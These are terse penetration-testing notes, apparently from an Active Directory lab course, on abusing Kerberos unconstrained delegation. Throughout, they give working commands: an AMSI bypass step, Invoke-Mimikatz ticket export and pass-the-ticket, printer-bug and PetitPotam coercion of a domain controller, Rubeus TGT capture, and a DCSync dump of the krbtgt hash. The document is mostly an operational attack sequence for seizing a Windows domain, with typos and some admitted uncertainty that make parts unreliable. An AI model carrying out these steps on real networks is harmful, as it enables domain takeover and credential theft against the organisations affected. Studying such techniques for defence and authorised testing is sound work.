- For an example we have machine pwn1 as an Unconstrained user; We are pwn0 and we got foot-hold/credentials/hashes for machine pwn2 who has local admin access for machine pwn1; Hence we can perform this attack
- Get a Powershell session as a different user using "Over pass the hash" attack if required(in this case its pwn2/appadmin)
- We can try searching for local admins it has access to using Find-LocalAdminAccess -Verbose
- Create a New-PSSession attaching to the "Unconstrained user"
- Enter the new session using Enter-PSSession
- Bypass the AMSI
- EXIT
- Load Mimikatz.ps1 on the new session using Invoke-command
- Enter the new session using Enter-PSSession again
- Now we can get the admin token and save it to the disk
- Try and check if you have any file from a DA
- If not we can try to pull if there is any sessions logged on as Administrator as pwn0 using Invoke-Hunter then run the attack again
- Once we get an DA token we can Reuse the token using Invoke-Mimikatz
- Now we can access any service on the DC; Example
ls \\dc-corp\C$
or use WMI-Commands / ScriptBlock:Not sure
Get-NetComputer -UnConstrained
Ignore the domain controllers if they apeare in the list as they have Unconstrained Delegation enabled
Get admin token After compromising the computer with UD enabled, we can trick or wait for an admin connection
Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'
Invoke-Mimikatz -Command '"kerberos::ptt [email protected]"'
Invoke-UserHunter -ComputerName dcorp-appsrv -Poll 100 -UserName Administrator -Delay 5 -Verbose
- Set Rubeus on monitor mode
- Run Print Bug using MS-RPRN or PetitPotman
- You will get the TGT on rubues
- Copy and inject that into memory using /ppt or do it manually
- Now you can access the shares or do a DCSync Attack
MS-RPRN.exe \\us-dc.us.techcorp.local \\us-web.us.techcorp.local
PetitPotam.exe us-web us-dc
PetitPotam uses EfsRpcOpenFileRaw function of MS-EFSRPC (Encrypting File System Remote Protocol) protocol and doesn't need credentials when used against a DC
# Captute the TGT
Rubeus.exe monitor /interval:5
# Copy the base64 encoded TGT, remove extra spaces and use it on the attacker' machine
Rubeus.exe ptt /tikcet:
# OR use Invoke-Mimikatz
[IO.File]::WriteAllBytes("C:\AD\Tools\USDC.kirbi",[Convert]::FromBase64String("ticket_from_Rubeus_monitor"))
Invoke-Mimikatz -Command '"kerberos::ptt C:\AD\Tools\USDC.kirbi"'
# Run DCSync
Invoke-Mimikatz -Command '"lsadump::dcsync /user:us\krbtgt"'